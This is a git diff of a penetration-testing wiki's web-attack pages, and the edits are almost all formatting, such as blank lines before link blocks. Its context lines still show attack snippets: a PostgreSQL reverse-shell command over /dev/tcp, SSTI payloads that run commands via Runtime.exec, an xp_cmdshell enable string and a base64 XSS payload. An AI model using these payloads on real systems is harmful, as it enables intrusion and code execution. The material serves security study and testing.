../abusing-hop-by-hop-headers.md {{#endref}} @@ -628,6 +629,7 @@ Content-Length: 50 Have you found some HTTP Request Smuggling vulnerability and you don't know how to exploit it. Try these other method of exploitation: + {{#ref}} ../http-response-smuggling-desync.md {{#endref}} @@ -636,12 +638,14 @@ Have you found some HTTP Request Smuggling vulnerability and you don't know how - Browser HTTP Request Smuggling (Client Side) + {{#ref}} browser-http-request-smuggling.md {{#endref}} - Request Smuggling in HTTP/2 Downgrades + {{#ref}} request-smuggling-in-http-2-downgrades.md {{#endref}} @@ -762,4 +766,3 @@ def handleResponse(req, interesting): {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ldap-injection.md b/src/pentesting-web/ldap-injection.md index 1b65ea692..186d74ac2 100644 --- a/src/pentesting-web/ldap-injection.md +++ b/src/pentesting-web/ldap-injection.md @@ -8,6 +8,7 @@ **If you want to know what is LDAP access the following page:** + {{#ref}} ../network-services-pentesting/pentesting-ldap.md {{#endref}} @@ -215,9 +216,9 @@ intitle:"phpLDAPadmin" inurl:cmd.php ### More Payloads + {{#ref}} https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/login-bypass/README.md b/src/pentesting-web/login-bypass/README.md index 02ccc2548..d6d2ce204 100644 --- a/src/pentesting-web/login-bypass/README.md +++ b/src/pentesting-web/login-bypass/README.md @@ -29,6 +29,7 @@ If you find a login page, here you can find some techniques to try to bypass it: In the following page you can find a **custom list to try to bypass login** via SQL Injections: + {{#ref}} sql-login-bypass.md {{#endref}} @@ -99,4 +100,3 @@ Pages usually redirects users after login, check if you can alter that redirect {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/oauth-to-account-takeover.md b/src/pentesting-web/oauth-to-account-takeover.md index 90989a6ff..63c3d1062 100644 --- a/src/pentesting-web/oauth-to-account-takeover.md +++ b/src/pentesting-web/oauth-to-account-takeover.md @@ -157,6 +157,7 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ For more detailed info about how to abuse AWS cognito check: + {{#ref}} https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html {{#endref}} diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md index 8735718dc..2cbc9d4e6 100644 --- a/src/pentesting-web/open-redirect.md +++ b/src/pentesting-web/open-redirect.md @@ -7,6 +7,7 @@ ### Redirect to localhost or arbitrary domains + {{#ref}} ssrf-server-side-request-forgery/url-format-bypass.md {{#endref}} @@ -187,4 +188,3 @@ exit; {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md index dc7bedc19..de19a76d9 100644 --- a/src/pentesting-web/postmessage-vulnerabilities/README.md +++ b/src/pentesting-web/postmessage-vulnerabilities/README.md @@ -138,6 +138,7 @@ Consequently, when a popup is opened under these conditions and a message is sen For more information **read**: + {{#ref}} bypassing-sop-with-iframes-1.md {{#endref}} @@ -157,6 +158,7 @@ You can force **`e.source`** of a message to be null by creating an **iframe** t For more information **read:** + {{#ref}} bypassing-sop-with-iframes-2.md {{#endref}} @@ -177,6 +179,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000); In the following page you can see how you could steal a **sensitive postmessage data** sent to a **child iframe** by **blocking** the **main** page before sending the data and abusing a **XSS in the child** to **leak the data** before it's received: + {{#ref}} blocking-main-page-to-steal-postmessage.md {{#endref}} @@ -185,6 +188,7 @@ blocking-main-page-to-steal-postmessage.md If you can iframe a webpage without X-Frame-Header that contains another iframe, you can **change the location of that child iframe**, so if it's receiving a **postmessage** sent using a **wildcard**, an attacker could **change** that iframe **origin** to a page **controlled** by him and **steal** the message: + {{#ref}} steal-postmessage-modifying-iframe-location.md {{#endref}} @@ -237,4 +241,3 @@ For **more information**: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/proxy-waf-protections-bypass.md b/src/pentesting-web/proxy-waf-protections-bypass.md index 62ffec5fb..21dde210c 100644 --- a/src/pentesting-web/proxy-waf-protections-bypass.md +++ b/src/pentesting-web/proxy-waf-protections-bypass.md @@ -176,6 +176,7 @@ These kind of context problems can also be used to **abuse other vulnerabilities ### H2C Smuggling + {{#ref}} h2c-smuggling.md {{#endref}} @@ -228,4 +229,3 @@ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascri {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md index 738d4bf24..44a7aafee 100644 --- a/src/pentesting-web/registration-vulnerabilities.md +++ b/src/pentesting-web/registration-vulnerabilities.md @@ -31,12 +31,14 @@ In that case you may try to bruteforce credentials. ### Oauth Takeovers + {{#ref}} oauth-to-account-takeover.md {{#endref}} ### SAML Vulnerabilities + {{#ref}} saml-attacks/ {{#endref}} @@ -171,6 +173,7 @@ JSON Web Token might be used to authenticate an user. - Edit the JWT with another User ID / Email - Check for weak JWT signature + {{#ref}} hacking-jwt-json-web-tokens.md {{#endref}} @@ -182,4 +185,3 @@ hacking-jwt-json-web-tokens.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md index c8b4cbc3c..6cabbd575 100644 --- a/src/pentesting-web/reset-password.md +++ b/src/pentesting-web/reset-password.md @@ -134,6 +134,7 @@ POST /api/changepass - If UUIDs (version 1) are guessable or predictable, attackers may brute-force them to generate valid reset tokens. Check: + {{#ref}} uuid-insecurities.md {{#endref}} @@ -253,4 +254,3 @@ uuid-insecurities.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/saml-attacks/README.md b/src/pentesting-web/saml-attacks/README.md index 6e68052da..4b30a6e1c 100644 --- a/src/pentesting-web/saml-attacks/README.md +++ b/src/pentesting-web/saml-attacks/README.md @@ -4,6 +4,7 @@ ## Basic Information + {{#ref}} saml-basics.md {{#endref}} @@ -123,6 +124,7 @@ You can use the Burp extension [**SAML Raider**](https://portswigger.net/bappsto If you don't know which kind of attacks are XXE, please read the following page: + {{#ref}} ../xxe-xee-xml-external-entity.md {{#endref}} @@ -157,6 +159,7 @@ Check also this talk: [https://www.youtube.com/watch?v=WHn-6xHL7mI](https://www. For more information about XSLT go to: + {{#ref}} ../xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}} @@ -304,4 +307,3 @@ with open("/home/fady/uberSAMLOIDAUTH") as urlList: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index d894c12f8..8a7488060 100644 --- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -229,6 +229,7 @@ XSLT file: Check the XSLT page: + {{#ref}} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}} @@ -241,6 +242,7 @@ xslt-server-side-injection-extensible-stylesheet-language-transformations.md ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt {{#endref}} diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md index 044d5da2b..b99b5d6e3 100644 --- a/src/pentesting-web/sql-injection/README.md +++ b/src/pentesting-web/sql-injection/README.md @@ -228,6 +228,7 @@ Also, if you have access to the output of the query, you could make it **print t ### Identifying with PortSwigger + {{#ref}} https://portswigger.net/web-security/sql-injection/cheat-sheet {{#endref}} @@ -373,6 +374,7 @@ Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, List to try to bypass the login functionality: + {{#ref}} ../login-bypass/sql-login-bypass.md {{#endref}} @@ -621,6 +623,7 @@ This trick was taken from [https://secgroup.github.io/2017/01/03/33c3ctf-writeup ### WAF bypass suggester tools + {{#ref}} https://github.com/m4ll0k/Atlas {{#endref}} @@ -632,6 +635,7 @@ https://github.com/m4ll0k/Atlas ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt {{#endref}} diff --git a/src/pentesting-web/sql-injection/mssql-injection.md b/src/pentesting-web/sql-injection/mssql-injection.md index f700872c7..512b2ea35 100644 --- a/src/pentesting-web/sql-injection/mssql-injection.md +++ b/src/pentesting-web/sql-injection/mssql-injection.md @@ -113,6 +113,7 @@ Additionally, there are alternative stored procedures like `master..xp_fileexist Obviously you could also use **`xp_cmdshell`** to **execute** something that triggers a **SSRF**. For more info **read the relevant section** in the page: + {{#ref}} ../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ {{#endref}} @@ -272,4 +273,3 @@ exec('sp_configure''xp_cmdshell'',''1''reconfigure')-- {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md index 5ad3537f9..ef020bdd2 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/README.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md @@ -19,6 +19,7 @@ You can [**read this example**](dblink-lo_import-data-exfiltration.md) to see a Check how to compromise the host and escalate privileges from PostgreSQL in: + {{#ref}} ../../../network-services-pentesting/pentesting-postgresql.md {{#endref}} @@ -91,4 +92,3 @@ SELECT $TAG$hacktricks$TAG$; {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md index f57342ec3..52b052578 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md @@ -135,6 +135,7 @@ SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"'); You can find this **library precompiled** to several different PostgreSQL versions and even can **automate this process** (if you have PostgreSQL access) with: + {{#ref}} https://github.com/Dionach/pgexec {{#endref}} @@ -294,6 +295,7 @@ A significant vulnerability arises from the `CREATE FUNCTION` command, which **p First of all you need to **use large objects to upload the dll**. You can see how to do that here: + {{#ref}} big-binary-files-upload-postgresql.md {{#endref}} diff --git a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md index d6cae5dfb..ceef84312 100644 --- a/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md +++ b/src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md @@ -309,6 +309,7 @@ SELECT req3('https://google.com'); #Request using python3 Check the following page: + {{#ref}} pl-pgsql-password-bruteforce.md {{#endref}} @@ -317,6 +318,7 @@ pl-pgsql-password-bruteforce.md Check the following page: + {{#ref}} rce-with-postgresql-extensions.md {{#endref}} @@ -324,4 +326,3 @@ rce-with-postgresql-extensions.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/README.md b/src/pentesting-web/ssrf-server-side-request-forgery/README.md index f42e88211..a3e873396 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/README.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/README.md @@ -24,6 +24,7 @@ The first thing you need to do is to capture a SSRF interaction generated by you Usually you will find that the SSRF is only working in **certain whitelisted domains** or URL. In the following page you have a **compilation of techniques to try to bypass that whitelist**: + {{#ref}} url-format-bypass.md {{#endref}} @@ -159,6 +160,7 @@ Create several sessions and try to download heavy files exploiting the SSRF from Check the following page for vulnerable PHP and even Wordpress functions: + {{#ref}} ../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md {{#endref}} @@ -283,6 +285,7 @@ Connection: close If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation: + {{#ref}} ../cors-bypass.md {{#endref}} @@ -362,6 +365,7 @@ Note that this is interesting to leak status codes that you couldn't leak before If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials: + {{#ref}} cloud-ssrf.md {{#endref}} @@ -370,6 +374,7 @@ cloud-ssrf.md Several known platforms contains or has contained SSRF vulnerabilities, check them in: + {{#ref}} ssrf-vulnerable-platforms.md {{#endref}} @@ -405,6 +410,7 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP ### To practice + {{#ref}} https://github.com/incredibleindishell/SSRF_Vulnerable_Lab {{#endref}} diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md index 0cc6dc336..6f5e61964 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md @@ -6,6 +6,7 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a - SugarCRM ≤ 14.0.0 – LESS `@import` injection in `/rest/v10/css/preview` enables unauthenticated SSRF & local file read. + {{#ref}} ../less-code-injection-ssrf.md {{#endref}} @@ -13,4 +14,3 @@ Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.a {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md index d200804c8..c0b185f78 100644 --- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md +++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -168,6 +168,7 @@ The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate vari Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header. + {{#ref}} https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet {{#endref}} diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index fab420745..990860895 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -221,6 +221,7 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')}) - [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/) + {{#ref}} el-expression-language.md {{#endref}} @@ -285,6 +286,7 @@ __${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x - [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation) + {{#ref}} el-expression-language.md {{#endref}} @@ -426,6 +428,7 @@ Expression Language (EL) is a fundamental feature that facilitates interaction b Check the following page to learn more about the **exploitation of EL interpreters**: + {{#ref}} el-expression-language.md {{#endref}} @@ -863,6 +866,7 @@ home = pugjs.render(injected_page) Check out the following page to learn tricks about **arbitrary command execution bypassing sandboxes** in python: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -961,6 +965,7 @@ Check out the following page to learn tricks about **arbitrary command execution **More details about how to abuse Jinja**: + {{#ref}} jinja2-ssti.md {{#endref}} @@ -1115,6 +1120,7 @@ If you think it could be useful, read: ## Brute-Force Detection List + {{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt {{#endref}} diff --git a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md index 34471afbc..d9f6d73e5 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md +++ b/src/pentesting-web/ssti-server-side-template-injection/jinja2-ssti.md @@ -177,6 +177,7 @@ The call to `__subclasses__` has given us the opportunity to **access hundreds o To learn about **more classes** that you can use to **escape** you can **check**: + {{#ref}} ../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ {{#endref}} @@ -363,4 +364,3 @@ The request will be urlencoded by default according to the HTTP format, which ca {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/unicode-injection/README.md b/src/pentesting-web/unicode-injection/README.md index b07b8ffa5..143f2116f 100644 --- a/src/pentesting-web/unicode-injection/README.md +++ b/src/pentesting-web/unicode-injection/README.md @@ -13,6 +13,7 @@ Unicode normalization occurs when **unicode characters are normalized to ascii c One common scenario of this type of vulnerability occurs when the system is **modifying** somehow the **input** of the user **after having checked it**. For example, in some languages a simple call to make the **input uppercase or lowercase** could normalize the given input and the **unicode will be transformed into ASCII** generating new characters.\ For more info check: + {{#ref}} unicode-normalization.md {{#endref}} @@ -66,4 +67,3 @@ In the blog post there are proposed methods to bypass vulnerabilities fixed usin {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/unicode-injection/unicode-normalization.md b/src/pentesting-web/unicode-injection/unicode-normalization.md index 4998d5941..05d1c7d57 100644 --- a/src/pentesting-web/unicode-injection/unicode-normalization.md +++ b/src/pentesting-web/unicode-injection/unicode-normalization.md @@ -79,6 +79,7 @@ Then, a malicious user could insert a different Unicode character equivalent to #### sqlmap template + {{#ref}} https://github.com/carlospolop/sqlmap_to_unicode_template {{#endref}} diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md index 0f2ba13e1..5dc2c81b6 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology.md +++ b/src/pentesting-web/web-vulnerabilities-methodology.md @@ -47,6 +47,7 @@ If the introduced data may somehow be reflected in the response, the page might Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: + {{#ref}} pocs-and-polygloths-cheatsheet/ {{#endref}} diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md index 27ab5169d..eaaf2388b 100644 --- a/src/pentesting-web/web-vulnerabilities-methodology/README.md +++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md @@ -46,6 +46,7 @@ If the introduced data may somehow be reflected in the response, the page might Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in: + {{#ref}} ../pocs-and-polygloths-cheatsheet/ {{#endref}} @@ -129,4 +130,3 @@ These vulnerabilities might help to exploit other vulnerabilities. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md index 112022aae..e5ed39a33 100644 --- a/src/pentesting-web/websocket-attacks.md +++ b/src/pentesting-web/websocket-attacks.md @@ -195,6 +195,7 @@ As Web Sockets are a mechanism to **send data to server side and client side**, This vulnerability could allow you to **bypass reverse proxies restrictions** by making them believe that a **websocket communication was stablished** (even if it isn't true). This could allow an attacker to **access hidden endpoints**. For more information check the following page: + {{#ref}} h2c-smuggling.md {{#endref}} @@ -207,4 +208,3 @@ h2c-smuggling.md {{#include ../banners/hacktricks-training.md}} - diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md index 0f328728d..6471d3166 100644 --- a/src/pentesting-web/xs-search.md +++ b/src/pentesting-web/xs-search.md @@ -69,6 +69,7 @@ For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/clocks](https:// - **Summary**: if trying to load a resource onerror/onload events are triggered with the resource is loaded successfully/unsuccessfully it's possible to figure out the status code. - **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)]() + {{#ref}} xs-search/cookie-bomb-+-onerror-xs-leak.md {{#endref}} @@ -93,6 +94,7 @@ In this case if `example.com/404` is not found `attacker.com/?error` will be loa - **Summary:** The [**performance.now()**](https://xsleaks.dev/docs/attacks/timing-attacks/clocks/#performancenow) **API** can be used to measure how much time it takes to perform a request. However, other clocks could be used, such as [**PerformanceLongTaskTiming API**](https://developer.mozilla.org/en-US/docs/Web/API/PerformanceLongTaskTiming) which can identify tasks running for more than 50ms. - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events) another example in: + {{#ref}} xs-search/performance.now-example.md {{#endref}} @@ -101,6 +103,7 @@ xs-search/performance.now-example.md This technique is just like the previous one, but the **attacker** will also **force** some action to take a **relevant amount time** when the **answer is positive or negative** and measure that time. + {{#ref}} xs-search/performance.now-+-force-heavy-task.md {{#endref}} @@ -159,6 +162,7 @@ Then, you can **distinguish between** a **correctly** loaded page or page that h - **Summary:** If the **page** is **returning** the **sensitive** content, **or** a **content** that can be **controlled** by the user. The user could set **valid JS code in the negative case**, an **load** each try inside **`